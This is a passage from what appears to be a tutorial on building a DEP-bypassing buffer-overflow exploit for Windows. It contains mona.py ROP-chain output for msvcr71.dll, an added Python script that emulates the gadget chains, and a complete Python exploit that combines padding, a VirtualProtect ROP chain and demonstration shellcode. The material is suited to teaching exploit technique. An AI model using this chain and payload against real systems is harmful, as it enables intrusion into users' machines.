        0x7c345c30,  # ptr to 'push esp # ret ' [msvcr71.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)  # the exploit must 'import struct'

rop_chain = create_rop_chain()

*** [ JavaScript ] ***

//rop chain generated with mona.py - www.corelan.be

rop_gadgets = unescape(

"%ucea2%u7c35" + // 0x7c35cea2 : ,# POP EBP # RETN [msvcr71.dll]

"%ucea2%u7c35" + // 0x7c35cea2 : ,# skip 4 bytes [msvcr71.dll]

"%u90be%u7c35" + // 0x7c3590be : ,# POP EAX # RETN [msvcr71.dll]

"%uffff%uffff" + // 0xffffffff : ,# Value to negate, will become 0x00000001

"%ud749%u7c34" + // 0x7c34d749 : ,# NEG EAX # RETN [msvcr71.dll]

"%u1748%u7c34" + // 0x7c341748 : ,# POP EBX # RETN [msvcr71.dll]

"%uffff%uffff" + // 0xffffffff : ,#

"%u5255%u7c34" + // 0x7c345255 : ,# INC EBX # FPATAN # RETN [msvcr71.dll]

"%u218e%u7c35" + // 0x7c35218e : ,# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]

"%u4160%u7c34" + // 0x7c344160 : ,# POP EDX # RETN [msvcr71.dll]

"%uefff%uffff" + // 0xffffefff : ,# Value to negate, destination value : 0x00001000

"%u1eb1%u7c35" + // 0x7c351eb1 : ,# NEG EDX # RETN [msvcr71.dll]

"%ue9bf%u7c36" + // 0x7c36e9bf : ,# DEC EDX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]

"%u4f87%u7c34" + // 0x7c344f87 : ,# POP EDX # RETN [msvcr71.dll]

"%uffc0%uffff" + // 0xffffffc0 : ,# Value to negate, will become 0x00000040

"%u1eb1%u7c35" + // 0x7c351eb1 : ,# NEG EDX # RETN [msvcr71.dll]

"%u5c69%u7c37" + // 0x7c375c69 : ,# POP ECX # RETN [msvcr71.dll]

"%uffff%uffff" + // 0xffffffff : ,#

"%u4e83%u7c35" + // 0x7c354e83 : ,# INC ECX # AND EAX,8000 # RETN [msvcr71.dll]

"%u8f2a%u7c35" + // 0x7c358f2a : ,# ADD ECX,EDX # ADD EAX,ECX # POP ESI # RETN [msvcr71.dll]

"%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)

"%u272f%u7c34" + // 0x7c34272f : ,# POP EDI # RETN [msvcr71.dll]

"%ud202%u7c34" + // 0x7c34d202 : ,# RETN (ROP NOP) [msvcr71.dll]

"%u2b3e%u7c36" + // 0x7c362b3e : ,# POP ESI # RETN [msvcr71.dll]

"%u15a2%u7c34" + // 0x7c3415a2 : ,# JMP [EAX] [msvcr71.dll]

"%u582e%u7c37" + // 0x7c37582e : ,# POP EAX # RETN [msvcr71.dll]

"%ua094%u7c37" + // 0x7c37a094 : ,# ptr to &VirtualAlloc() [IAT msvcr71.dll]

"%u8c81%u7c37" + // 0x7c378c81 : ,# PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]

"%u5c30%u7c34" + // 0x7c345c30 : ,# ptr to 'push esp # ret ' [msvcr71.dll]

""); // :

--------------------------------------------------------------------------------------------------

ROP generator finished

[+] Preparing output file 'stackpivot.txt'

- (Re)setting logfile c:\logs\1\stackpivot.txt

[+] Writing stackpivots to file c:\logs\1\stackpivot.txt

Wrote 758 pivots to file

[+] Preparing output file 'rop_suggestions.txt'

- (Re)setting logfile c:\logs\1\rop_suggestions.txt

[+] Writing suggestions to file c:\logs\1\rop_suggestions.txt

Wrote 656 suggestions to file

[+] Preparing output file 'rop.txt'

- (Re)setting logfile c:\logs\1\rop.txt

[+] Writing results to file c:\logs\1\rop.txt (2703 interesting gadgets)

Wrote 2703 interesting gadgets to file

[+] Writing other gadgets to file c:\logs\1\rop.txt (3854 gadgets)

Wrote 3854 other gadgets to file

Done

[+] This mona.py action took 0:01:15.248000

See? mona found us ROP chains, free of 0x00, in code for several languages. We'll copy the Python version.

0x07 Assembling the ROP exploit

I tested the ROP chain given above and it did not work. It seems the bad bytes were ignored.

I tried the bad bytes again and it still did not work; it seems this won't do, so let's just use the Corelan team's ROP chain!
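As an added example (not from the post, from mona or from Corelan), the Python 3 code below walks the gadget comments of mona's VirtualProtect() chain above and of the Corelan chain used in section 0x07, so the "Register setup for VirtualProtect()" table can be checked without a debugger. It models only the instruction kinds those comments contain and ignores the stack, so ESP stays 0; the names are my own.

```python
import re

MASK = 0xFFFFFFFF
REGS = ("EAX", "ECX", "EDX", "EBX", "ESP", "EBP", "ESI", "EDI")  # PUSHAD order

# mona's VirtualProtect() chain from the output above, as (dword, mona comment)
# pairs; the trailing "[msvcr71.dll]" tags are dropped to keep the lines short.
MONA_VP_CHAIN = [
    (0x7c375928, "POP EBP # RETN"),
    (0x7c375928, "skip 4 bytes"),
    (0x7c348495, "POP EAX # RETN"),
    (0xfffffdff, "Value to negate, will become 0x00000201"),
    (0x7c34d749, "NEG EAX # RETN"),
    (0x7c373ebf, "POP EBX # RETN"),
    (0xffffffff, ""),
    (0x7c345255, "INC EBX # FPATAN # RETN"),
    (0x7c35218e, "ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN"),
    (0x7c344f87, "POP EDX # RETN"),
    (0xffffffc0, "Value to negate, will become 0x00000040"),
    (0x7c351eb1, "NEG EDX # RETN"),
    (0x7c36345b, "POP ECX # RETN"),
    (0x7c38baf2, "&Writable location"),
    (0x7c342953, "POP EDI # RETN"),
    (0x7c34d202, "RETN (ROP NOP)"),
    (0x7c34adf5, "POP ESI # RETN"),
    (0x7c3415a2, "JMP [EAX]"),
    (0x7c3647cc, "POP EAX # RETN"),
    (0x7c37a140, "ptr to &VirtualProtect() [IAT]"),
    (0x7c378c81, "PUSHAD # ADD AL,0EF # RETN"),
]

# The Corelan chain that the final exploit in section 0x07 uses.
CORELAN_VP_CHAIN = [
    (0x7c37653d, "POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN"),
    (0xfffffdff, "Value to negate, will become 0x00000201 (dwSize)"),
    (0x7c347f98, "RETN (ROP NOP)"),
    (0x7c3415a2, "JMP [EAX]"),
    (0xffffffff, ""),
    (0x7c376402, "skip 4 bytes"),
    (0x7c351e05, "NEG EAX # RETN"),
    (0x7c345255, "INC EBX # FPATAN # RETN"),
    (0x7c352174, "ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN"),
    (0x7c344f87, "POP EDX # RETN"),
    (0xffffffc0, "Value to negate, will become 0x00000040"),
    (0x7c351eb1, "NEG EDX # RETN"),
    (0x7c34d201, "POP ECX # RETN"),
    (0x7c38b001, "&Writable location"),
    (0x7c347f97, "POP EAX # RETN"),
    (0x7c37a151, "ptr to &VirtualProtect() - 0x0EF [IAT]"),
    (0x7c378c81, "PUSHAD # ADD AL,0EF # RETN"),
]


def emulate_chain(chain):
    """Walk the gadget comments up to and including the PUSHAD gadget.

    Returns (pushed, final): `pushed` is what PUSHAD writes to the stack (EBX, EDX
    and ECX become VirtualProtect's arguments), `final` the registers after the
    gadget's trailing ADD AL,0EF, i.e. the EAX that JMP [EAX] will dereference."""
    regs = {r: 0 for r in REGS}
    pushed = None
    i = 0
    while i < len(chain) and pushed is None:
        _, comment = chain[i]
        i += 1
        for part in comment.split("#"):
            insn = re.sub(r"\s*\[[^\]]*\]\s*$", "", part).strip()
            if not insn:
                continue
            op, _, rest = insn.partition(" ")
            args = [a.strip() for a in rest.split(",")] if rest else []
            if op == "POP":                  # consumes the next chain entry as data
                regs[args[0]] = chain[i][0]
                i += 1
            elif op == "NEG":
                regs[args[0]] = -regs[args[0]] & MASK
            elif op in ("INC", "DEC"):
                regs[args[0]] = (regs[args[0]] + (1 if op == "INC" else -1)) & MASK
            elif op == "ADD" and args[0] == "AL":
                # only the low byte of EAX changes; the carry out of AL is lost
                eax = regs["EAX"]
                regs["EAX"] = (eax & ~0xFF) | ((eax + int(args[1], 16)) & 0xFF)
            elif op == "ADD":
                regs[args[0]] = (regs[args[0]] + regs[args[1]]) & MASK
            elif op == "XOR":
                regs[args[0]] ^= regs[args[1]]
            elif op == "AND":
                regs[args[0]] &= int(args[1], 16)
            elif op == "PUSHAD":
                pushed = dict(regs)
            elif op not in ("RETN", "FPATAN"):
                raise ValueError("gadget not modelled: " + insn)
    return pushed, regs
```

Both chains push EBX = 0x201 and EDX = 0x40 as the table requires, but the ADD AL,0EF that follows PUSHAD moves mona's EAX from 0x7c37a140 to 0x7c37a12f, off the IAT slot that JMP [EAX] dereferences, while the Corelan chain loads the pointer minus 0x0EF so that EAX ends at exactly 0x7c37a140.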

# -*- coding: utf-8 -*-
# Python 2: junk + ROP chain + shellcode; the ROP chain calls VirtualProtect()
# to make the stack executable before execution continues into the shellcode
import struct

def little_endian(address):
    # pack a 32-bit address as 4 little-endian bytes
    return struct.pack("<I", address)

junk = "A" * 128                     # padding up to the saved return address (offset 128)
#eip = little_endian(0x7c345c30)    # 0x7c345c30: not needed, the ROP chain starts at the return address
#nops = "\x90" * 20

# MessageBox shellcode, 113 bytes
shellcode = ""
shellcode += "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
shellcode += "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
shellcode += "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
shellcode += "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
shellcode += "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
shellcode += "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
shellcode += "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
shellcode += "\x49\x0b\x31\xc0\x51\x50\xff\xd7"

def create_rop_chain():
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        0x7c37653d,  # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
        0xfffffdff,  # Value to negate, will become 0x00000201 (dwSize)
        0x7c347f98,  # RETN (ROP NOP) [msvcr71.dll]
        0x7c3415a2,  # JMP [EAX] [msvcr71.dll]
        0xffffffff,  #
        0x7c376402,  # skip 4 bytes [msvcr71.dll]
        0x7c351e05,  # NEG EAX # RETN [msvcr71.dll]
        0x7c345255,  # INC EBX # FPATAN # RETN [msvcr71.dll]
        0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
        0x7c344f87,  # POP EDX # RETN [msvcr71.dll]
        0xffffffc0,  # Value to negate, will become 0x00000040
        0x7c351eb1,  # NEG EDX # RETN [msvcr71.dll]
        0x7c34d201,  # POP ECX # RETN [msvcr71.dll]
        0x7c38b001,  # &Writable location [msvcr71.dll]
        0x7c347f97,  # POP EAX # RETN [msvcr71.dll]
        0x7c37a151,  # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
        0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
        0x7c345c30,  # ptr to 'push esp # ret ' [msvcr71.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()

exploit = junk + rop_chain + shellcode

# write the file
try:
    rst = open("crash.txt", 'w')
    rst.write(exploit)
    rst.close()
    print "OK"
except IOError:
    print "Error"

That's it; I won't post a screenshot...
